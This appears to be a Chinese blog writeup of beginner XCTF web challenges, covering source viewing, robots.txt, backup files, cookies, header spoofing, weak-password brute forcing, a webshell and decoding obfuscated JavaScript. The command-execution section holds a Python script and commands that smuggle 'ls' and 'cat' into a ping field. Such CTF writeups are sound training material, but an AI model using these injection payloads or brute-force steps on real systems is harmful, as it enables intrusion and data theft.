XTCF web 题 解题步骤

一.view-source

在这里插入图片描述
查看网页源代码的方法:

  1. 鼠标右击,点击查看源代码
  2. 使用快捷键ctrl+u
  3. 在地址栏前面加上view-source
  4. 在浏览器的设置菜单框中,找到更多工具,然后选择开发者工具

本题使用view-source方法查看网页源代码
在这里插入图片描述
在这里插入图片描述

二. robots

补充知识:robots 是网站与爬虫之间的协议,用简单直接的txt格式文本方式告诉对应的爬虫被允许的权限,也就是说robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。

在这里插入图片描述

在这里插入图片描述
robots里的文件不可以自己爬取,但我们可以手动打开
在这里插入图片描述

三.backup

在这里插入图片描述
常见的备份文件后缀名为.bak
在这里插入图片描述
下载打开后即可
在这里插入图片描述

四.cookie

在这里插入图片描述
查看其cookie值
在这里插入图片描述
发现有cookie.php文件,尝试打开

在这里插入图片描述
在火狐中使用插件http header live
在这里插入图片描述

五. disabled-button

在这里插入图片描述
在这里插入图片描述
打开开发者工具
在这里插入图片描述
disabled 属性规定应该禁用 input 元素。
被禁用的 input 元素既不可用,也不可点击。可以设置 disabled 属性,直到满足某些其他的条件为止(比如选择了一个复选框等等)。
删除"disabled="后便可点击按钮
在这里插入图片描述

六. weak auth

在这里插入图片描述
在这里插入图片描述
此题为暴力破解题
暴力破解适合题目类型:登陆密码较为简单,且不会限制登录次数
使用burp爆破,根据字节长度不同,就可可知道密码

七.simpie_php

在这里插入图片描述

打开网址页面如下:
在这里插入图片描述
http://111.200.241.244:65060/?a=00a&&b=12345s

在这里插入图片描述

八.get_post

在这里插入图片描述

在这里插入图片描述
请添加图片描述
请添加图片描述
请添加图片描述

九.xff_referer

在这里插入图片描述
xff:是X-Forwarded-For的简写,用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。
referer:是告诉服务器我是从哪个地方来的
在这里插入图片描述
构造X-Forwarded-For=123.123.123.123
在这里插入图片描述

十.webshell

在这里插入图片描述
考察后门的利用,对于这道题使用菜刀工具
添加地址后,连接服务器,就可看到有flag.txt
打开后即可得到flag的值

十一.command_execution

在这里插入图片描述
ping命令常常会存在注入漏洞
在这里插入图片描述在这里插入图片描述
看到除了执行ping 命令,而且执行ls命令
用脚本找到flag的位置

import requests

url = "http://111.198.29.45:38835/"  

list = ['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'run.sh', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var'] 

for i in list: 

    payload = {"target": "127.0.0.1 | ls ../../../%s" % i} 

    res = requests.post(url, data=payload).text 

    if "flag" in res: 

        print("current: ", i)

        break

找到flag位置在home 目录下
进入home 目录,构造命令127.0.0.1&&ls …/…/…/…/…/…/…/home/
在这里插入图片描述
读取flag.txt的命令是cat …/…/…/…/…/…/home/flag.txt
在这里插入图片描述

十二.simple_js

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
看到\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"想到把\x转换为%,将字符串转换为URL编码,%35%35%2c%35%36%2c%35%34%2c%37%39%2c%31%31%35%2c%36%39%2c%31%31%34%2c%31%31%36%2c%31%30%37%2c%34%39%2c%35%30
用burp 解码得:55,56,54,79,115,69,114,116,107,49,50
,将这串数字进行ascii码转换得到值,按照flag格式为Cyberpeace{xxxxxxxxx} ,提交即可

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值